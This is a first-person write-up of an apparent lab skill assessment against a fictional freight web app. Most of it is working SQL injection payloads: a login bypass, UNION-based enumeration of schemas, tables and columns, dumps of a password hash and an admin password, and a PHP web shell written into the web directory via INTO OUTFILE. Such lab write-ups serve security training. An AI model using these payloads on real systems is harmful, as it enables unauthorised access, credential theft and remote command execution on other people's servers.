Skill Assessment
First I can see a login, try to sqli basic -->
admin' or 1=1-- -

Then, i can see search panel and info of names, i test if this field is vulnerable:


It is vulnerable, true. Now i try to connect to unions select -->
ADAM' UNION SELECT 1,2,3,4,5-- -

Nice try daddy, now i list the secure_file_priv, to view if this field is vulnerable:
ADAM' UNION SELECT 1,2, variable_name, variable_value, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

Now, i try to upload a webshell -->
adam' union select "",'<?php system($_REQUEST[0]); ?>', "", "", "" into outfile '/var/www/html/shell.php'-- -


No problem, i will try display the bbdd and password of admin to login and do it upload
ADAM' UNION select 1,schema_name,3,4,5 from INFORMATION_SCHEMA.SCHEMATA-- -

List all bbdd, and see ilfreight and backup, nice. I see with database(), what ddbb is using this webapp:
ADAM' UNION select 1,database(),2,3,4-- -

NICE, now list all tables, columns and info -->
ADAM' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4,5 from INFORMATION_SCHEMA.TABLES where table_schema='ilfreight'-- -

ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='users'-- -

Now we can see all content off this columns -->
ADAM' UNION select 1,2, username, password, 4 from ilfreight.users-- -

adam : 1be9f5d3a82847b8acca40544f953515
Try to login again into the login... but...


NO SURRENDER! I will try to enum the backup bbdd

ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='admin_bk'-- -

Now, i list the columns:
ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='admin_bk'-- -

To the end, i display all data of this comuns -->
ADAM' UNION select 1,2, username, password, 4 from backup.admin_bk-- -

admin : Inl@n3_fre1gh7_adm!n
NOW YEAAAHHH, but... it is the same user i have... sooooo.

There are something i am doing bad... The above responde message is: Permsion Denied... Yeah... but... the query is it:
' union select "",'<?php system($_REQUEST[0]); ?>', "","", "" into outfile '/var/www/html/shell.php'-- -

"Cant create to file in /var/www/html", but... i am in /dashboad/dasboard.php, try it -->
' union select "",'<?php system($_REQUEST[0]); ?>', "","", "" into outfile '/var/www/html/dashboard/shell.php'-- -
NOTHING ERROR!! Search the file

HOLY SH1T!! I NEED SLEEP

Last updated